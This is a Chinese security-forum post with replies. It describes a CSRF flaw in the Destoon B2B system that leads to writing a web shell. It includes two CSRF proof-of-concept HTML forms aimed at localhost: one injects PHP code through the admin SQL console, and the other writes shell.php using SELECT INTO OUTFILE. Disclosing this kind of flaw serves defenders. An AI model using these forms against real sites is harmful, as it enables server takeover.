用户
搜索
  • TA的每日心情
    擦汗
    昨天 09:52
  • 签到天数: 52 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    32

    主题

    187

    帖子

    1255

    魔法币
    收听
    0
    粉丝
    5
    注册时间
    2017-5-9

    限定版春秋段子手i春秋签约作者

    发表于 2017-9-25 14:34:30 1127117
    前言 本文原创作者:薄荷糖微微凉,未经允许不得转载!

    Destoon B2B网站管理系统是一套完善的B2B(电子商务)行业门户解决方案。系统基于PHP+MySQL开发,采用B/S架构,模板与程序分离,源码开放。模型化的开发思路,可扩展或删除任何功能;创新的缓存技术与数据库设计,可负载不低于百万级别数据容量及访问。系统被数万b2b网站所采用,同时,也有数量巨大的开发者利用该系统进行二次开发。

    0x 01 受影响版本以及利用成功的条件
    受影响版本官方最新版
    条件为后台开启SQL功能

    1.png
                                  
    *******************************************************************************************
    0x 02第一种方式,利用CSRF提升用户权限然后执行管理员操作GETSHELL
    1,首先我们先在前台注册一个用户。这里随便注册,这里注册的用户我们可以提升权限。

    2.png

    2,然后我们构造一个提升我们的会员至管理员的数据包并放置在外部网站上,在友情链接申请处添加一个友链申请,将我们构造好数据包的链接放入,引导管理员查看。


    3.png
    4.png
    3,在后台管理员进行审核时会查看该链接时我们的会员就变成了管理员。然后此时可以使用下面的方式进行getshell
       5.png

    0x 03第二种方式,直接使用csrf漏洞来getshell
    1,后台打开SQL管理功能时会有如下的操作界面。
    6.png

    2,构造插入shell代码的sql语句然后放置外部网站,通过申请链接功能来使管理员进行访问
    7.png

    3,当管理员查看该链接时,在数据库中便插入了我们的代码。

    [AppleScript] 纯文本查看 复制代码
    <html>  <!-- CSRF PoC - generated by Burp Suite Professional -->  <body>   
    <form action="http://127.0.0.1/destoon/admin.php?" method="POST">      
    <input type="hidden" name="file" value="database" />      
    <input type="hidden" name="action" value="execute" />      
    <input type="hidden" name="sql" value="INSERT INTO destoon_keylink (itemid,title,url,item,listorder)VALUE ('1','<?php phpinfo() ?>','sdd','ds',1)" />      
    <input type="hidden" name="submit" value="�#137;§ �#161;Œ" />      
    <input type="submit" value="Submit request" />   
    </form>  
    </body>
    </html>

    8.png

    4,构造我们生成shell页面的数据包,然后同样通过申请友链的方式进行诱使管理员操作。
    [AppleScript] 纯文本查看 复制代码
    <html>  <!-- CSRF PoC - generated by Burp Suite Professional -->  <body>   
    <form action="http://127.0.0.1/destoon/admin.php?" method="POST">      
    <input type="hidden" name="file" value="database" />      
    <input type="hidden" name="action" value="execute" />      
    <input type="hidden" name="sql" value="SELECT title FROM destoon_keylink WHERE url='sdd' INTO OUTFILE '../../../../www/destoon/shell.php'" />      
    <input type="hidden" name="submit" value="�#137;§ �#161;Œ" />      
    <input type="submit" value="Submit request" />   
    </form>  
    </body>
    </html>

    9.png

    5,当管理员访问该链接时,就在服务器端生成了shell脚本。
    10.png
    11.png







    评分

    参与人数 4魔法币 +158 收起 理由
    n1tc0xDE + 5 感谢发布原创作品,i春秋论坛因你更精彩!.
    Coande + 3 感谢你的分享,i春秋论坛有你更精彩!.
    yyyxy + 50 辛苦鱼蛋兄发文
    诚殷网络论坛 + 100 请问是否可以转载?

    查看全部评分

    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证
    沙发
    发表于 2017-9-25 17:12:08
    如果可以请私信告知我
    echo "技术本不难,难见有心人,诚殷网络WEB渗透培训让你从另一个角度学习渗透!";
    使用道具 举报 回复
    发表于 2017-9-25 17:31:25
    学习了 如何利用csrf漏洞getshell
    使用道具 举报 回复
    诚殷网络论坛 发表于 2017-9-25 17:12
    如果可以请私信告知我

    我觉得可以转。。。。。。
    使用道具 举报 回复
    发表于 2017-9-27 11:17:43
    如果过程可以更详细一点的话 就更完美了
    使用道具 举报 回复
    发表于 2017-9-27 16:07:10
    这个条件也太那个了
    使用道具 举报 回复
    发表于 2017-9-28 01:22:19
    需要管理员多次点击交互,感觉利用成功率不高
    该会员没有填写今日想说内容.
    使用道具 举报 回复
    发表于 2017-9-29 07:10:28
    n1tc0xDE 发表于 2017-9-28 01:22
    需要管理员多次点击交互,感觉利用成功率不高

    好像只能post提交吧,比织梦那个都难利用 肯定不如xss
    使用道具 举报 回复
    发表于 2017-9-29 14:22:10
    思路挺好的
    使用道具 举报 回复
    发表于 2017-10-11 09:16:34
    诚殷网络论坛 发表于 2017-9-25 17:12
    如果可以请私信告知我

    文章是帮坏蛋发的,你要联系坏蛋
    使用道具 举报 回复
    发表于 2017-10-18 09:18:48
    66666666666666666666666666666666666666666666666666666666666666666
    使用道具 举报 回复
    发表于 2017-10-26 05:36:54
    这个可以由 csrf漏洞getshell
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册